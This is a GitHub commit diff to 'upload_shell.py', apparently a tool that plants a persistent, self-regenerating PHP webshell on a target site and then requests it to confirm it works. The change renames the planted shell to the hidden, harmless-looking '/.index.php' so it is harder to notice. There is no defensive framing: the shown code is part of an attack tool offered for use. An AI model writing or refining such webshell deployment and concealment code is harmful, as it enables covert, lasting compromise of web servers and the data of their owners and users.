Update upload_shell.py

This commit is contained in:
admintony 2017-11-16 20:52:26 +08:00 committed by GitHub
parent 69d55d4be5
commit 85ca75ae85
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -120,7 +120,7 @@ def upload(url,method,passwd):
except :
pass
#尝试访问不死马生成的shell
shell_url = b_url+"/.fuckyou.php"
shell_url = b_url+"/.index.php"
res = requests.get(shell_url)
if res.status_code!=200 :
print "[-] %s create shell failed!" %bsm_url